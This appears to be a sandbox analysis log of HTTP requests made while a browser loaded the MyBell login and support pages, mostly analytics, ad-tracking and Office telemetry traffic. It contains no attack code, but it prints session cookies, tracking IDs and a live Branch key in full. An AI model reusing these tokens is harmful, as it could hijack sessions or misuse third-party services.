Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=6&dv=1&dl=157&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=browser&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=8&dv=1&dl=64&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/693653/c.json HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveX-DI-jspsf: 1X-DI-int-state: X-DI-lid: B7D567C29E92EA123347BB99E4B686613CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-DI-cookieflags: 3|0|0|0|3|0X-DI-sid: 84E654F18AD2AE89A616AA13A6B4CC6A8FAccept: */*Origin: https://support.bell.caSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3If-None-Match: W/012546114-192E2B478BB
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=7&dv=1&dl=67&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=12&dv=1&dl=1094&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=10&dv=1&dl=322&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=11&dv=1&dl=86&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=html&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=9&dv=1&dl=55547&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /td/rul/953414520?random=1730380359679&cv=11&fst=1730380359679&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/953414520/?random=1730380359679&cv=11&fst=1730380359679&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/953414520/?random=1730380359679&cv=11&fst=1730379600000&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dg5XKBiIT0zPFUVs_3EK36oaJjREA2He5cBZuo7c8DZ3UmC0r&random=1840511711&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i/14028/693653/c.json HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveX-DI-jspsf: 1X-DI-int-state: X-DI-lid: B7D567C29E92EA123347BB99E4B686613CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-DI-cookieflags: 3|0|0|0|3|0X-DI-sid: 84E654F18AD2AE89A616AA13A6B4CC6A8FAccept: */*Origin: https://mybell.bell.caSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3If-None-Match: W/012546114-192E2B478BB
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wdccan/36793/onsite/generic1730279018395.js HTTP/1.1Host: resources.digital-cloud.medallia.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m2/bellcanada/mbox/json?mbox=target-global-mbox&mboxSession=e8acc2285415480dbbf54ad6f854a96e&mboxPC=e8acc2285415480dbbf54ad6f854a96e.37_0&mboxPage=b690d05597134b3087af7cf5ef75c06e&mboxRid=4cf59d2eb9664c44a588099a000084b2&mboxVersion=1.8.2&mboxCount=1&mboxTime=1730365948984&mboxHost=mybell.bell.ca&mboxURL=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&mboxReferrer=&browserHeight=907&browserWidth=1263&browserTimeOffset=-240&screenHeight=1024&screenWidth=1280&colorDepth=24&devicePixelRatio=1&screenOrientation=landscape&webGLRenderer=ANGLE%20%28Google%2C%20Vulkan%201.3.0%20%28SwiftShader%20Device%20%28Subzero%29%20%280x0000C0DE%29%29%2C%20SwiftShader%20driver%29&lob=&dflob=&language=en&province=on&footprint=&PostalCode=&LoggedInStatus=false&epp_company_code=dock%20is%20not%20present%3Ai&profile.IspCheckAvail=false&mboxMCSDID=1998BC1DA4CB7CA3-5F625B5BF750FFBD&mboxMCGVID=26404690240998747124274156036452379072&mboxAAMB=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&mboxMCGLH=6 HTTP/1.1Host: somni.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/953414520/?random=1730380345423&cv=11&fst=1730379600000&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dKAK7Fzvn8r58wY3hWa5UUlhwjDUYX807ADDRAyE1QausB8LG&random=182547160&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__9 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /wdccan/36793/onsite/embed.js HTTP/1.1Host: resources.digital-cloud.medallia.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "ab480182e18a16841a9028d8857825bb"If-Modified-Since: Wed, 30 Oct 2024 09:03:40 GMT
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__10 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__11 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
